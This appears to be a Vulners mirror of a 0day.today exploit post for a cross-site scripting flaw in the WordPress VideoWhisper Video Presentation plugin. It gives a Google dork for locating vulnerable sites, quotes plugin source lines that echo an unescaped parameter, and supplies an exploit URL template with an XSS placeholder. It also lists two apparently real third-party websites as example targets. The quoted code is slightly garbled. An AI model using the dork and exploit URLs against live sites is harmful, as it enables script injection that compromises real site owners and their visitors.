Lucene search
K

Wordpress VideoWhisper Video Presentation plugin XSS Vulnerability

🗓️ 30 Nov 2015 00:00:00Reported by sniper.tType 
zdt
 zdt
🔗 0day.today👁 29 Views

Wordpress VideoWhisper Video Presentation plugin XSS Vulnerability, exploit through admin-ajax.ph

Code
######################################################################
# Exploit Title: Wordpress plugin videowhisper-video-presentation  XSS Vulnerability
# Vendor or Software Link: https://wordpress.org/plugins/videowhisper-video-presentation/
# Google dork: inurl:/wp-content/plugins/videowhisper-video-presentation
######################################################################
 
 The code in ./videowhisper-video-presentation/videowhisper_presentation.php
 

    2: echo echo "<BR><a target='_blank' href='" . $admin_ajax . "?action=vwcns_trans&task=html5&room=$room&stream=$room'> Preview </a> (open in Safari)"; 

    1075: $admin_ajax = admin_url() . 'admin-ajax.php'; 

    977: $room = sanitize_file_name($_GET['room']); 

    977: $room = sanitize_file_name($_GET['room']);; 
 
 
 
 
 
Exploit Code
http://server/wp-admin/admin-ajax.php?action=vwcns_trans&task=html5&room=room&stream=room=/*XSS_HERE*/


example

http://www.freelancewritersacademy.com/wp-admin/admin-ajax.php?action=vwcns_trans&task=html5&room=room&stream=room=/*XSS_HERE*/
http://www.learningunlimited.co/wp-admin/admin-ajax.php?action=vwcns_trans&task=html5&room=room&stream=room=/*XSS_HERE*/

#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2015 00:00Current
7.1High risk
Vulners AI Score7.1
29